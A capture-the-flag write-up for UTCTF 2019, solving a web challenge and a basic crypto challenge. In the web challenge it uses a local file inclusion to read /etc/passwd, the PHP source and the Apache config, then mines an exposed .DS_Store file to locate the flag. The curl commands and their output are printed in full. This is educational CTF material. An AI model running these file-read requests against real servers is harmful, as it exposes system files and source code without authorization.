writeups

UTCTF 2019 - Write-ups

noraj (Alexandre ZANNI)
, , , ,
🇬🇧

Information#

CTF#

  • Name : UTCTF 2019
  • Website : isss.io
  • Type : Online
  • Format : Jeopardy
  • CTF Time : link

650 - HabbyDabby's Secret Stash - Web#

HabbyDabby's hidden some stuff away on his web server that he created and wrote from scratch on his Mac. See if you can find out what he's hidden and where he's hidden it!

http://a.goodsecurity.fail/

by copperstick6

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<html>
<head>
  <meta charset="utf-8">
          <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
          <title>Locked Away</title>
          <meta name="description" content="">
          <meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<style>
  body{
    background-color:#62C2C5;
  }
</style>
<body>
  <h1>Welcome to HabbyDabby's Secret Stash</h1>
  <h2>You'll never get our secrets!</h2>
  <div style="visibility: hidden; display:inline;">

    <form method="get">
       <select name="file">
        <option value="english.html">English</option>
        <option value="french.html">French</option>
       </select>
       <input type="submit">
    </form>
  </div>
</body>
</html>

So there is an hidden form. We can call http://a.goodsecurity.fail/?file=english.html for example, telling us You'll never get our secrets!.

That sounds like an LFI (Local File Inclusion).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ curl http://a.goodsecurity.fail/?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false

Let's see the source code curl 'http://a.goodsecurity.fail/?file=index.php':

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
   if ( isset( $_GET['file'] ) ) {
           $file = $_GET['file'];
           if( !file_exists($file) ) die("File not found");
           if ($file === "english.html" || $file === "french.html"){
                   echo file_get_contents( $_GET['file'] );
           }
           else{
                        // Force the download
                        header("Content-Disposition: attachment; filename=" . basename($file));
                        header("Content-Length: " . filesize($file));
                        header("Content-Type: application/octet-stream;");
                        readfile($file);
           }
   }
   else{
           echo file_get_contents("index.html");
   }
?>

At least there is nothing unusual, all seems to be default files for a Debian 9:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
curl 'http://a.goodsecurity.fail/?file=/etc/apache2/sites-enabled/000-default.conf'
<VirtualHost *:80>
  ServerAdmin contact@isss.io
  ServerName localhost
  DocumentRoot /var/www/site

  <Directory /var/www/site/>
      Options Indexes FollowSymLinks MultiViews
      AllowOverride All
      Order deny,allow
      Allow from all
  </Directory>

  ErrorLog ${APACHE_LOG_DIR}/error.log
  CustomLog ${APACHE_LOG_DIR}/access.log combined
 </VirtualHost>

The description is talking about MAC so I thought about __MACOSX and .DS_Store.

1
curl 'http://a.goodsecurity.fail/?file=.DS_Store' --output output

Let's try with the excellent tool: ds_store_exp, it parses .DS_Store file and download files recursively:

1
2
3
4
5
6
7
8
$ python2 ds_store_exp/ds_store_exp.py 'http://a.goodsecurity.fail/.DS_Store'
[+] http://a.goodsecurity.fail/.DS_Store
[+] http://a.goodsecurity.fail/e/.DS_Store
[+] http://a.goodsecurity.fail/index.html
[+] http://a.goodsecurity.fail/a
[+] http://a.goodsecurity.fail/e/d/.DS_Store
[+] http://a.goodsecurity.fail/e/d/e/.DS_Store
[+] http://a.goodsecurity.fail/e/d/e/flag.txt
1
2
$ curl http://a.goodsecurity.fail/e/d/e/flag.txt
utflag{mac_os_hidden_files_are_stupid}

200 - [basics] crypto - Crypto#

Can you make sense of this file?

by balex

TL;DR:

  1. Binary to ascii
  2. Base64 decode
  3. Caesar cipher with a 10 shift
  4. Alphabetical substitution

You can use https://cryptii.com/ or CLI.

utflag{3ncrypt10n_15_c00l}

The hardest part is to get the scoreboard alive to submit the flag.

Note: 0% real life but it is a starter challenge so I guess it is ok.

Share